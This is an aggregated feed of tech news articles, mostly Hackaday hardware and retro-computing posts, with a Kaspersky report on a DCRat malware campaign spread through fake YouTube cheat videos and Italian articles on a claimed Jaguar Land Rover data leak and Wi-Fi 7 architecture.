[Alex] of YouTube channel [EastMakes] wrote into tell me about his fantastic QWERTY ‘hexpansion’ board for the 2024 EMF Tildagon badge, and [Alex], I’m super glad you did. The system works!

Let’s back up a bit. Essentially, the idea is to have a badge that can be used beyond a single camp, with the creation of expansion boards being the other main attraction. Our own [Jenny List] covered the badge in detail back in June 2024 when she got her hands on one.

Image by [EastMakes] via YouTube[Alex] started by importing the Tildagon into Fusion360 and designing a way for the keyboard to attach to it physically. He then modeled the keyboard after the Blackberry types that can be found on Ali using the official EMF buttons established in earlier badges.

This QWERTY hexpansion is based on the RP2040, which is soldered around back and visible through the 3D-printed backplate. In order for the 90°-oriented board to align with the… not-90° connector, [Alex] built a little meander into the PCB.

The default OS on the Tildagon doesn’t know natively what to do with the serial messages from the keyboard, so [Alex] wrote an application that reads them in and decodes them. Be sure to check out the build and walk-through video after the break.

youtube.com/embed/5mLt09UtY2E?…

More, Children, Is Just a Slot Away

[New-Concentrate6308] is cooking up something new in the form of a 50% keyboard with a cartridge slot! The custom layout has been dubbed Esul, and has the Esc to the left of Tab, among other other interesting features.

Image by [New-Concentrate6308] via redditInspired by [mujimanic]’s giga 40, the cartridges add modules to the keyboard. If you want a screen, just slot one in. You could also up the RGB, or add something useful like a knob, or even some more keys.

You may have noticed the lack of an up arrow key. It’s there, it’s just a tap away on the right Shift, which if you hold it down, becomes Shift.

This thing is not going to be for everyone, but that’s not the point. (Is it ever?) The point is that [New-Concentrate6308] wanted a fun keyboard project and found it in spades. Plus, it looks fantastic.

The Centerfold: At the Corner of Practical and Paradise

Image by [jamesvyn] via redditDo I really need to say anything here? Can we all just enjoy the beauty of Switzerland for a moment?

[jamesvyn] recently switched from two monitors to a wide boi and is loving every minute of it. I particularly like the base — something about that shape is quite pleasing.

I bet it was difficult to find a wallpaper that does the view any justice. I have almost no details here, but I can tell you that the pager-looking thing near the mouse is a Pomodoro timer. And that’s an interesting wrist rest block-thing. Not sure I could use that for an extended period of time. Could you?

Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!

Historical Clackers: the Oliver

Today, we can not only see what we type as we type it, we can do things like correct entire words with a simple key combination (Ctrl + Backspace).
An Oliver no. 2 machine. Image via The Antikey Chop
In the late 1800s, though, seeing what you were typing as well as we do now was a pipe dream until the Oliver typewriter came along. It is thought that inventor Rev. Thomas Oliver sought to create a machine that would make his sermons more legible.

Oliver typewriters were quite distinct with their three-row keyboards and so-called ‘batwing’ typebar arrangement. This style, wherein the typebars struck the platen downward instead of upward made it a partially visible typewriter. Since it would be years until fully visible Underwoods and Royals came along, this made the Oliver quite the sought-after machine.

Unfortunately, this three-row design did not stay in vogue. As the four-row, single-Shift layout became standard, the writing was on the wall for the Oliver. Adding a fourth row of keys would have meant even taller batwings and an even heavier machine.

Some Oliver models were re-badged for foreign markets and carried names such as Courier, Stolzenberg, Jwic, Fiver, and Revilo. Stateside, the No. 2 was rebranded by Sears & Roebuck as the Woodstock.

Finally, the Clicks Keyboard Case Comes to Android

Do you miss your Blackberry or Sidekick? I miss my Palm Centro’s bubble-poppy keyboard, and I’d love to have a Sidekick or something comparable today. Or like, anything with a keyboard.

Image by [Clicks] via New AtlasIf you don’t mind having an even bigger phone, then the dream is alive in the form of the Clicks keyboard case, which has finally made its way to Android phones beginning with the the Google Pixel 9 and 9 Pro.

The Android Clicks cases will be even better than those created for the iPhone, with upgrades like larger, backlit, domed metal keys, a flexible TPU shell, and a felt lining to protect the phone. Also, there will be Qi wireless charging right through the case, which will accept magnetic accessories as well.

While cases for the Pixel 9s are available for pre-order at $99, there is also the option to reserve Clicks for the 2024 Motorola razr as well as the Samsung Galaxy S25. Check out the overview video if you want to know more, and you can also see it in action on the aforementioned phones.

Or — hear me out — we could just get devices with physical keyboards again. There’s obviously a demand. Your move, manufacturers.

Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.

hackaday.com/2025/03/11/keebin…

Unless you’ve got an especially small lap, calling the Toshiba Libretto a laptop is a bit of a stretch. The diminutive computers from the mid-1990s had a lot of the usual laptop features, but in an especially compact and portable case that made them a great choice for anyone with an on-the-go lifestyle.

Fast-forward thirty years or so, and the remaining Librettos haven’t fared too well. Many of them have cases that crumble at the slightest touch, which is what led [polymatt] to undertake this meticulous case replacement. The effort started with a complete teardown; luckily, the lower aluminum-alloy shell was in fine shape, but the upper case parts were found to be almost too deteriorated to handle. Still, with a little patience and the judicious application of tape, [polymatt] was able to scan the case pieces on a flatbed scanner and import them into his CAD package. Great tip on the blue-tack for leveling the parts for accurate scanning, by the way.

After multiple rounds of printing and tweaking, [polymatt] had a case good enough to reassemble the Libretto. Unfortunately, the previous owner left an unwanted gift: a BIOS password. Disconnecting the CMOS battery didn’t reset it, but a little research told him that shorting a few pins on the parallel port on the machine’s dock should do the trick. It was a bit involved, requiring the design and subsequent bodging of a PCB to fit into the docking port connector, but in the end he was able to wake up a machine to all its Windows 95 glory. Better get patching.

In a time when laptops were more like lap-crushers, the Libretto was an amazing little machine, and thirty years on, they’re well worth saving from the scrap heap. Hats off to [polymatt] for the effort to save this beauty, and if he needs tips on reading data from any PCMCIA cards that may have come with it, we’ve got him covered.

youtube.com/embed/AdeswJreJ98?…

hackaday.com/2025/03/11/tiny-l…

In the world of programming languages it often feels like being stuck in a Groundhog Day-esque loop through purgatory, as effectively the same problems are being solved over and over, with previous solutions forgotten and there’s always that one jubilant inventor stumbling out of a darkened basement with the One True Solution to everything that plagues this world beset by the Unspeakable Horror that is the C programming language.

As the latest entry to pledge its fealty at the altar of the Church of the Holy Memory Safety, TrapC promises to fix C, while also lambasting Rust for allowing that terrible unsafe keyword. Of course, since this is yet another loop through purgatory, the entire idea that the problem is C and some perceived issue with this nebulous ‘memory safety’ is still a red herring, as pointed out previously.

In other words, it’s time for a fun trip back to the 1970s when many of the same arguments were being rehashed already, before the early 1980s saw the Steelman language requirements condensed by renowned experts into the Ada programming language. As it turns out, memory safety is a miniscule part of a well-written program.

It’s A Trap

Pretty much the entire raison d’être for new programming languages like TrapC, Rust, Zig, and kin is this fixation on ‘memory safety’, with the idea being that the problem with C is that it doesn’t check memory boundaries and allows usage of memory addresses in ways that can lead to Bad Things. Which is not to say that such events aren’t bad, but because they are so obvious, they are also very easy to detect both using static and dynamic analysis tools.

As a ‘proposed C-language extension’, TrapC would add:

• memory-safe pointers.
• constructors & destructors.
• the trap and alias keywords.
• Run-Time Type Information.

It would also remove:

• the goto and union keywords.

The author, Robin Rowe, freely admits to this extension being ‘C++ like’, which takes us right back to 1979 when a then young Danish computer scientist (Bjarne Stroustrup) created a C-language extension cheekily called ‘C++’ to denote it as enhanced C. C++ adds many Simula features, a language which is considered the first Object-Oriented (OO) programming language and is an indirect descendant of ALGOL. These OO features include constructors and destructors. Together with (optional) smart pointers and the bounds-checked strings and containers from the Standard Template Library (STL) C++ is thus memory safe.

So what is the point of removing keywords like goto and union? The former is pretty much the most controversial keyword in the history of programming languages, even though it derives essentially directly from jumps in assembly language. In the Ada programming language you also have the goto keyword, with it often used to provide more flexibility where restrictive language choices would lead to e.g. convoluted loop constructs to the point where some C-isms do not exist in Ada, like the continue keyword.

The union keyword is similarly removed in TrapC, with the justification that both keywords are ‘unsafe’ and ‘widely deprecated’. Which makes one wonder how much real-life C & C++ code has been analyzed to come to this conclusion. In particular in the field of embedded- and driver programming with low-level memory (and register) access the use of union is widely used for the flexibility it offers.

Of course, if you’re doing low-level memory access you’re also free to use whatever pointer offset and type casting you require, together with very unsafe, but efficient, memcpy() and similar operations. There is a reason why C++ doesn’t forbid low-level access without guardrails, as sometimes it’s necessary and you’re expected to know what you’re doing. This freedom in choosing between strict memory safety and the untamed wilds of C is a deliberate design choice in C++. In embedded programming you tend to compile C++ with both RTTI & exceptions disabled as well due to the overhead from them.

Don’t Call It C++

Effectively, TrapC adds RTTI, exceptions (or ‘traps’), OO classes, safe pointers, and similar C++ features to C, which raises the question of why it’s any different, especially since the whitepaper describes TrapC and C++ code usually looking the same as a feature. Here the language seems to regard itself as being a ‘better C++’, mostly in terms of exception handling and templates, using ‘traps’ and ‘castplates’. Curiously there’s not much focus on “resource allocation is initialization” (RAII) that is such a cornerstone of C++.

Meanwhile castplates are advertised as a way to make C containers ‘typesafe’, but unlike C++ templates they are created implicitly using RTTI and one might argue somewhat opaque (C++ template-like) syntax. There are few people who would argue that C++ template code is easy to read. Of note here is that in embedded programming you tend to compile C++ with both RTTI & exceptions disabled due to the overhead from them. The extensive reliance on RTTI in TrapC would seem to preclude such an option.

Circling back on the other added keyword, alias, this is TrapC’s way to providing function overloading, and it works like a C preprocessor #define:
void puts(void* x) alias printf("{}n",x);
Then there is the new trap keyword that’s apparently important enough to be captured in the extension’s name. These are offered as an alternative to C++ exceptions, but the description is rather confusing, other than that it’s supposedly less complicated and does not support cascading exceptions up the stack. Here I do not personally see much value either way, as like so many C++ developers I loathe C++ exceptions with the fire of a thousand Suns and do my utmost to avoid them.

My favorite approach here is found in Ada, which not only cleanly separates functions and procedures, but also requires, during compile time, that any return value from a function is handled, and implements exceptions in a way that is both light-weight and very informative, as I found for example while extensively using the Ada array type in the context of a lock-free ring buffer. During testing there were zero crashes, just the program bailing out with an exception due to a faulty offset into the array and listing the exact location and cause, as in Ada everything is bound-checked by default.

Memory Safety

Much of the safety in TrapC would come from managed pointers, with its author describing TrapC’s memory management as ‘automatic’ in a recent presentation at an ISO C meeting. Pointers are lifetime-managed, but as the whitepaper states, the exact method used is ‘implementation defined’, instead of reference counting as in the C++ specification.

Yet none of this matters in the context of actual security issues. As I noted in 2024, the ‘red herring’ part refers to the real-life security issues that are captured in CVEs and their exploitation. Virtually all of the worst CVEs involve a lack of input validation, which allows users to access data in ‘restricted’ folders and gain access to databases and other resources. None of which involve memory safety in any way or form, and thus the onus lies on preventing logic errors, solid input validation and preventing lazy or inattentive programmers from introducing the next world-famous CVE.

As a long-time C & C++ programmer, I have come to ‘love’ the warts in these languages as well as the lack of guardrails for the freedom they provide. Meanwhile I have learned to write test cases and harnesses to strap my code into for QA sessions, because the best way to validate code is by stressing it. Along the way I have found myself incredibly fond of Ada, as its focus on preventing ambiguity and logic errors is self-evident and regularly keeps me from making inattentive mistakes. Mistakes that in C++ would show up in the next test and/or Valgrind cycle followed by a facepalm moment and recompile, yet somehow programming in Ada doesn’t feel more restrictive than writing in C++.

Thus I’ll keep postulating that the issues with C were already solved in 1983 with the introduction of Ada, and accepting this fact is the only way out of this endless Groundhog Day purgatory.

hackaday.com/2025/03/11/trapc-…

Popular Science has an excellent article on how Josephine Cochrane transformed how dishes are cleaned by inventing an automated dish washing machine and obtaining a patent in 1886. Dishwashers had been attempted before, but hers was the first with the revolutionary idea of using water pressure to clean dishes placed in wire racks, rather than relying on some sort of physical scrubber. The very first KitchenAid household dishwashers were based on her machines, making modern dishwashers direct descendants of her original design.
Josephine Cochrane (née Garis)
It wasn’t an overnight success. Josephine faced many hurdles. Saying it was difficult for a woman to start a venture or do business during this period of history doesn’t do justice to just how many barriers existed, even discounting the fact that her late husband was something we would today recognize as a violent alcoholic. One who left her little money and many debts upon his death, to boot.

She was nevertheless able to focus on developing her machine, and eventually hired mechanic George Butters to help create a prototype. The two of them working in near secrecy because a man being seen regularly visiting her home was simply asking for trouble. Then there were all the challenges of launching a product in a business world that had little place for a woman. One can sense the weight of it all in a quote from Josephine (shared in a write-up by the USPTO) in which she says “If I knew all I know today when I began to put the dishwasher on the market, I never would have had the courage to start.”

But Josephine persevered and her invention made a stir at the 1893 World’s Fair in Chicago, winning an award and mesmerizing onlookers. Not only was it invented by a woman, but her dishwashers were used by restaurants on-site to clean tens of thousands of dishes, day in and day out. Her marvelous machine was not yet a household device, but restaurants, hotels, colleges, and hospitals all saw the benefits and lined up to place orders.

Early machines were highly effective, but they were not the affordable, standard household appliances they are today. There certainly existed a household demand for her machine — dishwashing was a tedious chore that no one enjoyed — but household dishwashing was a task primarily done by women. Women did not control purchasing decisions, and it was difficult for men of the time (who did not spend theirs washing dishes) to be motivated about the benefits. The device was expensive, but it did away with a tremendous amount of labor. Surely the price was justified? Yet women themselves — the ones who would benefit the most — were often not on board. Josephine reflected that many women did not yet seem to think of their own time and comfort as having intrinsic value.

Josephine Cochrane ran a highly successful business and continued to refine her designs. She died in 1913 and it wasn’t until the 1950s that dishwashers — direct descendants of her original design — truly started to become popular with the general public.

Nowadays, dishwashers are such a solved problem that not only are they a feature in an instructive engineering story, but we rarely see anyone building one (though it has happened.)

We have Josephine Cochrane to thank for that. Not just her intellect and ingenuity in coming up with it, but the fact that she persevered enough to bring her creation over the finish line.

hackaday.com/2025/03/11/joseph…

Since the beginning of the year, we’ve been tracking in our telemetry a new wave of DCRat distribution, with paid access to the backdoor provided under the Malware-as-a-Service (MaaS) model. The cybercriminal group behind it also offers support for the malware and infrastructure setup for hosting the C2 servers.

Distribution

The DCRat backdoor is distributed through the YouTube platform. Attackers create fake accounts or use stolen ones, then upload videos advertising cheats, cracks, gaming bots and similar software. In the video description is a download link to the product supposedly being advertised. The link points to a legitimate file-sharing service where a password-protected archive awaits, the password for which is also in the video description.

YouTube video ad for a cheat and crack

Instead of gaming software, these archives contain the DCRat Trojan, along with various junk files and folders to distract the victim’s attention.

Archives with DCRat disguised as a cheat and crack

Backdoor

The distributed backdoor belongs to a family of remote access Trojans (RATs) dubbed Dark Crystal RAT (DCRat for short), known since 2018. Besides backdoor capability, the Trojan can load extra modules to boost its functionality. Throughout the backdoor’s existence, we have obtained and analyzed 34 different plugins, the most dangerous functions of which are keystroke logging, webcam access, file grabbing and password exfiltration.

DCRat builder plugins on the attackers’ site

Infrastructure

To support the infrastructure, the attackers register second-level domains (most often in the RU zone), which they use to create third-level domains for hosting the C2 servers. The group has registered at least 57 new second-level domains since the start of the year, five of which already serve more than 40 third-level domains.

A distinctive feature of the campaign is the appearance of certain words in the second-level domains of the malicious infrastructure, such as “nyashka”, “nyashkoon”, “nyashtyan”, etc. Users interested in Japanese pop culture will surely recognize these slang terms. Among anime and manga fans, “nyasha” has come to mean “cute” or “hon”, and it’s this word that’s most often seen in the second-level domains.

C2 server addresses with characteristic naming approach

Victims

Based on our telemetry data since the beginning of 2025, 80% of DCRat samples using such domains as C2 servers were downloaded to the devices of users in Russia. The malware also affected a small number of users from Belarus, Kazakhstan and China.

Conclusion

Kaspersky products detect the above-described samples with the verdict
Backdoor.MSIL.DCRat.
Note that we also encounter campaigns distributing other types of malware (stealers, miners, loaders) through password-protected archives, so we strongly recommend downloading game-related software only from trusted sources.

securelist.com/new-wave-of-att…

Il mondo della cybersecurity potrebbe essere di fronte a un nuovo possibile attacco che avrebbe colpito una delle icone dell’automotive britannico. Jaguar Land Rover (JLR), il prestigioso produttore di veicoli di lusso, sarebbe stato menzionato in un presunto Data Breach rivendicato da un cybercriminale noto come “Rey”, che affermerebbe di aver ottenuto e pubblicato dati aziendali altamente sensibili.

Al momento, non possiamo confermare la veridicità della notizia, poiché l’organizzazione non ha ancora rilasciato alcun comunicato stampa ufficiale sul proprio sito web riguardo l’incidente. Pertanto, questo articolo deve essere considerato come ‘fonte di intelligence’.

Dettagli del post nel Forum Underground

Secondo quanto riportato nel post sul Dark Web, il presunto data breach includerebbe circa 700 documenti interni, tra cui development logs, tracking data e persino codice sorgente. Inoltre, si parla di un set di dati dei dipendenti che conterrebbe informazioni sensibili come nome utente, e-mail, nome visualizzato, fuso orario e altro ancora.

Se queste informazioni fossero autentiche, potrebbero includere dati riservati su progetti in sviluppo, strategie aziendali e informazioni personali dei dipendenti, con possibili rischi legati a furti d’identità, attacchi di spear phishing e spionaggio industriale. Quali sarebbero le conseguenze per JLR? Se il leak contenesse informazioni su modelli futuri o innovazioni tecnologiche, il danno potrebbe estendersi ben oltre il singolo attacco, impattando la competitività dell’azienda nel lungo periodo.

Un attacco mirato o una falla sfruttata?

Al momento, non ci sono conferme ufficiali sulla dinamica dell’attacco, né sulla sua autenticità. Non è chiaro se si tratti di un’infiltrazione mirata o se Rey avrebbe semplicemente sfruttato una vulnerabilità nei sistemi di JLR. Tuttavia, le informazioni circolate suggerirebbero una possibile preparazione accurata e un’azione coordinata. Se vero, sarebbe un segnale allarmante per l’intero settore automotive, sempre più esposto alle minacce informatiche.

Un segnale d’allarme per il settore automotive?

Se confermato, questo attacco non sarebbe un caso isolato: il settore automobilistico è sempre più nel mirino dei cybercriminali, che vedono nelle aziende automotive un’enorme quantità di dati preziosi e infrastrutture critiche da compromettere. Con l’avvento dei veicoli connessi e delle supply chain digitalizzate, il rischio di intrusioni informatiche diventa sempre più elevato.

Conclusione

Ancora una volta, se queste informazioni fossero veritiere, dimostrerebbero quanto sia cruciale adottare strategie di sicurezza avanzate e rafforzare le misure di protezione per prevenire fughe di dati e attacchi devastanti. La domanda che rimane aperta è: quanto è davvero preparato il settore automotive a contrastare questa escalation di minacce?

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.

L'articolo Jaguar Land Rover nel mirino: un Threat Actor rivendica la pubblicazione di dati riservati! proviene da il blog della sicurezza informatica.

How many cars go down your street each day? How fast were they going? What about folks out on a walk or people riding bikes? It’s not an easy question to answer, as most of us have better things to do than watch the street all day and keep a tally. But at the same time, this is critically important data from an urban planning perspective.

Of course, you could just leave it to City Hall to figure out this sort of thing. But what if you want to get a speed bump or a traffic light added to your neighborhood? Being able to collect your own localized traffic data could certainly come in handy, which is where TrafficMonitor.ai from [glossyio] comes in.

This open-source system allows the user to deploy an affordable monitoring device that will identify vehicles and pedestrians using a combination of machine learning object detection and Doppler radar. The system not only collects images of all the objects that pass by but can even determine their speed and direction. The data is stored and processed locally and presented via a number of graphs through the system’s web-based user interface.

While [glossyio] hopes to sell kits and even pre-built monitors at some point, you’ll have to build the hardware yourself for now. The documentation recommends a Raspberry Pi 5 for the brains of your monitor, backed up by a Coral AI Tensor Processing Unit (TPU) to help process the images coming in via the Pi Camera Module 3.

Technically, the OPS243-A Doppler radar sensor is listed as optional if you’re on a tight budget, but it looks like you’ll lose speed and direction sensing without it. Additionally, there’s support for adding an air quality sensor to see what all those passing cars are leaving behind.

This isn’t the first time we’ve seen the Raspberry Pi used as an electronic traffic cop, but it’s undoubtedly the most polished version of the concept we’ve come across. You might consider passive radar, too.

hackaday.com/2025/03/11/homebr…

Le reti wireless IEEE 802.11, meglio note come Wi-Fi, sono il cuore pulsante della connettività moderna. Da soluzione di nicchia per uso domestico a pilastro tecnologico per l’Internet delle Cose (IoT), le smart cities e le infrastrutture aziendali, il Wi-Fi si è evoluto diventando inarrestabile. Oggi, nel 2025, l’arrivo di Wi-Fi 7 (IEEE 802.11be) porta velocità teoriche oltre i 46 Gb/s e latenze sotto il millisecondo, ma con esso emergono nuove sfide: sicurezza, interferenze e gestione dello spettro.

In questo articolo, parte della rubrica Wi-Fi di Red Hot Cyber, analizziamo i fondamenti delle reti IEEE 802.11, esplorando la loro architettura, il funzionamento del segnale, i vantaggi e i limiti. L’obiettivo è comprendere non solo le potenzialità del Wi-Fi 7, ma anche le sfide emergenti, in particolare quelle legate alla sicurezza informatica e alla gestione dello spettro.

Perché il Wi-Fi Domina (e Dove Inciampa)

Immaginate un mondo senza Wi-Fi: niente smartphone connessi, niente smart home, niente uffici senza grovigli di cavi. Il Wi-Fi ha conquistato il pianeta grazie a quattro punti di forza:

• Mobilità pura: Ti muovi, resti connesso. Dai magazzini robotizzati ai campus universitari, è un game-changer.
• Costi abbattuti: Niente cablaggi significa installazioni rapide e risparmi del 30-40% rispetto all’Ethernet [1]. Perfetto per edifici storici o strutture temporanee.
• Velocità da urlo: Con Wi-Fi 7, il Multi-Link Operation (MLO) sfrutta simultaneamente le bande a 2,4, 5 e 6 GHz, spingendo il throughput a livelli mai visti.
• Flessibilità estrema: Da una LAN casalinga a un’azienda con migliaia di dispositivi, il Wi-Fi si adatta.

Ma non è tutto oro quel che luccica. La trasmissione via onde radio lo rende vulnerabile: un attaccante con un’antenna direzionale può intercettare segnali a distanza, e anche il WPA3 non è immune a exploit sofisticati. Poi ci sono le interferenze – microonde e Bluetooth congestionano i 2,4 GHz, mentre i 6 GHz richiedono strategie avanzate per evitare overlap. Infine, la portata: regolamenti come quelli ETSI (20-30 dBm) limitano la copertura a 100-200 metri all’aperto, e dentro casa un muro di cemento può dimezzarla.

Come Funziona: l’Architettura del Wi-Fi

Il Wi-Fi si regge su un’architettura a celle, i Service Set, che definiscono come i dispositivi parlano tra loro:

IBSS (Ad Hoc): Comunicazione diretta tra dispositivi

In una rete IBSS (Independent Basic Service Set), non esiste un Access Point (AP): i dispositivi si connettono direttamente tra loro. Questo schema, noto anche come modalità Ad Hoc, è utile per scenari emergenziali o reti temporanee.

Esempio: Sensori industriali in una fabbrica o un sito di perforazione remota possono usare IBSS per scambiarsi dati direttamente, senza bisogno di un’architettura di rete complessa.

• Scenario: Un sistema di monitoraggio di gas tossici in una miniera o raffineria, in cui i sensori devono condividere letture in tempo reale con una centralina mobile senza un’infrastruttura fissa.

Funzionamento: I sensori si collegano in modalità Ad Hoc, trasmettendo informazioni critiche tra loro per generare un’allerta locale in caso di pericolo.

BSS: Reti con Access Point (AP) centralizzato

Nel Basic Service Set (BSS), un AP funge da coordinatore, gestendo i client Wi-Fi e ottimizzando la comunicazione. Questo modello è standard per ambienti domestici e aziendali.

Esempio: rete Wi-Fi 6 per piccoli uffici, con singolo AP che sfrutta OFDMA (Orthogonal Frequency-Division Multiple Access) e MU-MIMO per gestire più connessioni simultanee, assegnando porzioni di spettro in modo più efficiente.

ESS: Reti a copertura estesa con roaming continuo

L’Extended Service Set (ESS) collega più BSS attraverso un Distribution System (DS), solitamente via Ethernet o backhaul wireless. È il modello usato per garantire copertura senza interruzioni su grandi superfici.

Esempio:

• In un ospedale con handoff veloce, gli AP usano 802.11r (Fast Roaming) per garantire il passaggio fluido dei client da un AP all’altro senza dover eseguire una nuova autenticazione completa (grazie al Key Caching).
• In ambienti industriali con AGV (Automated Guided Vehicles), il Wi-Fi deve garantire roaming senza latenza. Protocolli come 802.11k/v permettono ai dispositivi di sapere in anticipo quale AP è il migliore a cui connettersi, riducendo i tempi di transizione.

Nel 2025, Wi-Fi 7 alza l’asticella: l’MLO permette di usare più bande in parallelo, riducendo latenza e aumentando affidabilità. Il risultato? Un dispositivo può passare dai 2,4 GHz (portata lunga) ai 6 GHz (alta capacità) senza che tu te ne accorga. Aggiungete canali a 320 MHz e MU-MIMO bidirezionale, e avete una rete che regge anche 50 dispositivi in una stanza senza battere ciglio.

Dopo aver visto come funziona l’architettura Wi-Fi con IBSS, BSS ed ESS per garantire connettività e roaming continuo, viene spontaneo chiedersi: cosa succede fisicamente al segnale mentre ci muoviamo da un Access Point all’altro?

Il Segnale Wi-Fi: Fisica al Lavoro

Il Wi-Fi non è solo software e reti, ma onde elettromagnetiche che devono superare distanze e ostacoli per connettere i dispositivi. Le sue frequenze operano nelle bande ISM (2,4 e 5 GHz) e U-NII (6 GHz), e la loro propagazione è governata da precise leggi fisiche. La frequenza detta tutto: a 2,4 GHz la lunghezza d’onda è 12,5 cm, ideale per attraversare muri; a 6 GHz scende a 5 cm, perfetta per velocità ma fragile contro ostacoli.

La potenza ricevuta crolla con la distanza secondo la legge dell’inverso del quadrato:

Pr​=(4πR)2Pt​​

Aggiungete assorbimento (10-15 dB per un muro in cemento) e riflessioni, e capite perché il segnale si spegne a 50 metri indoors. Ma ci sono trucchi: il beamforming focalizza le onde come un faro, e l’OFDM suddivide i dati in sottocanali per schivare interferenze. Il Wi-Fi 7 spinge oltre, con 4096-QAM che infila più bit in ogni simbolo, aumentando il throughput del 20% rispetto a Wi-Fi 6.

Wi-Fi 7: il Futuro è Ora

Nel 2025, Wi-Fi 7 è il nuovo standard di riferimento, portando la connettività wireless a livelli mai visti prima:

• Canali a 320 MHz: Il doppio di Wi-Fi 6, per un’autostrada di dati.
• MLO: Multi-banda in tempo reale, latenza sotto 1 ms.
• 6 GHz: Spettro pulito, ma serve più densità di AP per coprire.

Risultato? Puoi streammare 8K, gestire un’armata di dispositivi IoT e lavorare in remoto senza lag. Ma c’è un prezzo: più AP significa più costi, e la sicurezza deve stare al passo con minacce sempre più sofisticate.

Sfide di Sicurezza e Prospettive

Il Wi-Fi è potente, ma anche vulnerabile se non protetto adeguatamente. WPA3 rappresenta un passo avanti, ma le minacce persistono:

• Attacchi di deauthentication flood, che disconnettono forzatamente i dispositivi.
• Exploitation di vulnerabilità nei chipset, come dimostrato dagli attacchi FragAttacks (2021).
• IoT in crescita esponenziale – Ogni dispositivo connesso è un potenziale punto debole nella rete.

MLO aiuta a distribuire il traffico e ridurre i rischi, ma senza crittografia e segmentazione adeguata, un Access Point compromesso può essere un cavallo di Troia. Inoltre, la diffusione della banda 6 GHz porterà a una maggiore densità di dispositivi, rendendo necessaria l’adozione di algoritmi AI per la gestione dinamica delle interferenze e l’ottimizzazione dei canali in tempo reale.

Conclusione: un Equilibrio Precario

Il protocollo IEEE 802.11 è un capolavoro di ingegneria, che ha reso il Wi-Fi sinonimo di velocità, flessibilità e ubiquità. Con Wi-Fi 7, il futuro della connettività entra in una nuova era, ma non senza compromessi:

• Sicurezza e minacce informatiche restano una sfida costante.
• Interferenze e gestione dello spettro richiederanno soluzioni intelligenti.
• Costi e scalabilità potrebbero rallentare l’adozione in certi ambienti.

Per chi si occupa di cybersecurity e gestione delle reti, il messaggio è chiaro: progettare con lungimiranza, proteggere ogni strato e prepararsi a un mondo sempre più wireless – e sempre più esposto ai rischi.

Seguici sulla nostra Rubrica WiFi per rimanere sempre aggiornato!

Riferimenti:

[1] IEEE (2024). Wi-Fi 7 Technical Overview.

[2] Higher Order Feature Extraction and Selection for Robust Human Gesture Recognition using CSI of COTS Wi-Fi Devices mdpi.com/1424-8220/19/13/2959

L'articolo Dentro le Reti Wireless IEEE 802.11: Architettura e Segnale Wi-Fi proviene da il blog della sicurezza informatica.

There’s something magical about the clunk of a heavy 1950s portable radio – the solid thunk of Bakelite, the warm hum of tubes glowing to life. This is exactly why [Ken’s Lab] took on the restoration of a Philco 52-664, a portable AC/DC radio originally sold for $45 in 1953 (a small fortune back then!). Despite its beat-up exterior and faulty guts, [Ken] methodically restored it to working condition. His video details every crackling capacitor and crusty resistor he replaced, and it’s pure catnip for any hacker with a soft spot for analog tech. Does the name Philco ring a bell? Lately, we did cover the restoration of a 1958 Philco Predicta television.

What sets this radio hack apart? To begin with, [Ken] kept the restoration authentic, repurposing original capacitor cans and using era-appropriate materials – right down to boiling out old electrolytics in his wife’s discarded cooking pot. But, he went further. Lacking the space for modern components, [Ken] fabbed up a custom mounting solution from stiff styrofoam, fibreboard, and all-purpose glue. He even re-routed the B-wiring with creative terminal hacks. It’s a masterclass in patience, precision, and resourcefulness.

If this tickles your inner tinkerer, don’t miss out on the full video. It’s like stepping into a time machine.

youtube.com/embed/TimWXHoAfss?…

hackaday.com/2025/03/10/hackin…

Satellite imagery is in the news right now, but not all satellite constellations are the preserve of governments. Satellogic operates a series of CubeSats with Earth imaging payloads, and best of all, they maintain an open dataset. [Mark Litwintschik] takes us through using it.

Starting with a script to recover the locations of the satellites, he moves on to the data itself. It’s in a huge S3 bucket, for which parsing the metadata becomes a big data question rather than one of simple retrieval. After parsing he loads the resulting data into a database, from which he can then perform queries more easily. He uses Qatar as his example, and shows us the resulting imagery.

The dataset isn’t comprehensive, it’s obvious that the areas surveyed have been done at the behest of customers. But who knows, your part of the world might be one of the areas in the dataset, and now you have all the tools you need to explore. It certainly beats low-res weather satellite imagery.

hackaday.com/2025/03/10/satell…

[Tech Minds] built one of those cheap automatic antenna tuners you see everywhere — this one scaled up to 350 watt capability. The kit is mostly built, but you do have to add the connectors and a few other stray bits. You can see how he did it in the video below.

What was very interesting, however, was that it wasn’t able to do a very good job tuning a wire antenna across the ham bands, and he asks for your help on what he should try to make things better.

It did seem to work in some cases, and changing the length of the wire changed the results, so we would guess some of it might be a resonance on the antenna wire. However, you would guess it could do a little better. It is well known that if a wire is one of a number of certain lengths, it will have extremely high impedence in multiple ham bands and be challenging to tune. So random wires need to not be exactly random. You have to avoid those lengths.

In addition, we were surprised there wasn’t more RF protection on the power lines. We would probably have suggested winding some coax to act as a shield choke, RF beads, and even extra bypass capacitors.

Another possible problem is that the diodes in these units are often not the best. [PU1OWL] talks about that in another video and bypasses some of the power lines against RF, too.

If you have any advice, we are sure he’d love to hear it. As [PU1OWL] points out, a tuner like this can’t be any better than its SWR measurement mechanism. Of course, all of these tuners take a few watts to light them up. You can, however, tune with virtually no power with a VNA.

youtube.com/embed/L8VH30MwNEU?…

hackaday.com/2025/03/10/whats-…

Modern e-readers such as the Amazon Kindle are incredible pieces of engineering, but that doesn’t mean there’s no room for improvement. A device custom-built to your own specifications is always going to provide a more satisfying experience than something purchased off the shelf. That’s why [fel88] put together this custom e-reader which offers a number of unique features, such as a solar panel on the back and button-free operation.

One issue with modern e-readers, at least as [fel88] sees it, is that they have a lot of unnecessary features. This project removes most of them, stripping down the device to its core functionality: a straightforward menu for selecting books and gesture-sensing for navigating the menu as well as changing the pages. The only physical input on the device is a small reed switch to turn the device on. A 3D printed case holds the e-ink display and encloses the inner workings, driven by an Arduino Mega 2560 and powered by three lithium-ion capacitors (LICs) and a small solar panel.

